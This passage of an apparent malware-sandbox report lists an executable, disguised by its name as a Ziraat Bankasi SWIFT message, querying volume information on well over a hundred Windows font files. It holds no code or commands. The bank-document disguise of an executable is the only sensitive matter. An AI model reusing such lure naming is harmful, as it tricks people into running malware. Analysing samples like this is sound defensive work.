Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
